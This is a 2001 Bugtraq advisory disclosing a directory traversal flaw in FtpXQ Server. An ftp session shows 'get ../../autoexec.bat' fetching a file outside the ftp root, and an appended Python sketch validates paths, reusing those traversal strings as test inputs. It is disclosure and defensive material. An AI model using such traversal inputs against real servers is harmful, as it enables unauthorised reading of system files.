Bugtraq mailing list archives
Vulnerability in FtpXQ Server
From: joetesta () HUSHMAIL COM
Date: Wed, 28 Feb 2001 18:32:19 -0500
----- Begin Hush Signed Message from joetesta () hushmail com -----

Vulnerability in FtpXQ Server

Overview

FtpXQ Server 2.0.93 is an ftp server available from
http://www.datawizard.net and http://www.download.com. A vulnerability
exists which allows an attacker to download files outside the ftp root.

Details

The following is an illustration of the problem. An ftp root of
"c:\directory\directory" was used.

    % ftp localhost
    Connected to xxxxxxxxx.rh.rit.edu.
    220 DataWizard Technologies' FtpXQ FTP Server. (Version 2.0.93).
    User (xxxxxxxxx.rh.rit.edu:(none)): test
    331 OK need password.
    Password:
    230 Welcome to DataWizard Technologies' FtpXQ FTP Server.
    ftp> pwd
    257 Remote directory is "/directory/directory/"
    ftp> cd ..
    550 Requested file action not taken---user does not have access.
    ftp> get ../../autoexec.bat
    200 OK
    150 Opening data connection.
    226 Transfer completed.
    ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
    ftp>

Solution

No quick fix is possible.

Vendor Status

DataWizard Technologies, Inc. was contacted via
<ftpxq () datawizard net> on Tuesday, February 20, 2001. No reply was
received.

- Joe Testa ( e-mail: joetesta () hushmail com / AIM: LordSpankatron )

This message has been signed with a Hush Digital Signature. To verify
the signature, please go to www.hush.com/tools
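
Added example, not part of the original post and not FtpXQ code: in the session above "cd .." is refused while "get ../../autoexec.bat" succeeds, so this sketch sends every path argument through one resolver and checks containment on the final path. The names resolve, is_allowed and OutsideRoot, and the session model in which "/" is the ftp root, are assumptions for illustration.

```python
import ntpath  # Windows path rules; importable on any platform

FTP_ROOT = r"c:\directory\directory"  # the ftp root used in the advisory


class OutsideRoot(Exception):
    """The requested path resolves outside the ftp root."""


def resolve(root, cwd, arg):
    """Map a client-supplied path to a real path, or raise OutsideRoot.

    cwd is the session's virtual directory ("/" is the ftp root, an
    assumption of this example); arg is the raw argument of any
    path-taking command (CWD, RETR, STOR, DELE, ...).
    """
    if "\x00" in arg:
        raise OutsideRoot(arg)
    parts = [root]
    # Virtual absolute paths start at the ftp root, others at the session cwd.
    if not arg.startswith(("/", "\\")):
        parts.append(cwd.strip("/\\"))
    parts.append(arg.lstrip("/\\"))
    # Join, then collapse ".", ".." and mixed separators in one place.
    real = ntpath.normpath(ntpath.join(*parts))
    root_nc = ntpath.normcase(ntpath.normpath(root))
    real_nc = ntpath.normcase(real)
    # Compare the final path, so the rule is the same for every command.
    if real_nc != root_nc and not real_nc.startswith(root_nc + "\\"):
        raise OutsideRoot(arg)
    return real


def is_allowed(cwd, arg, root=FTP_ROOT):
    """True if arg, issued from cwd, stays inside the ftp root."""
    try:
        resolve(root, cwd, arg)
    except OutsideRoot:
        return False
    return True


if __name__ == "__main__":
    # Constructed inputs; the first two are the arguments from the session.
    for cwd, arg in [("/", ".."), ("/", "../../autoexec.bat"),
                     ("/", "..\\..\\autoexec.bat"), ("/pub", "../readme.txt")]:
        print(f"{cwd!r:8} {arg!r:26} allowed={is_allowed(cwd, arg)}")
```

The check is lexical: if junctions or symbolic links can exist under the ftp root, the real target has to be resolved before the comparison.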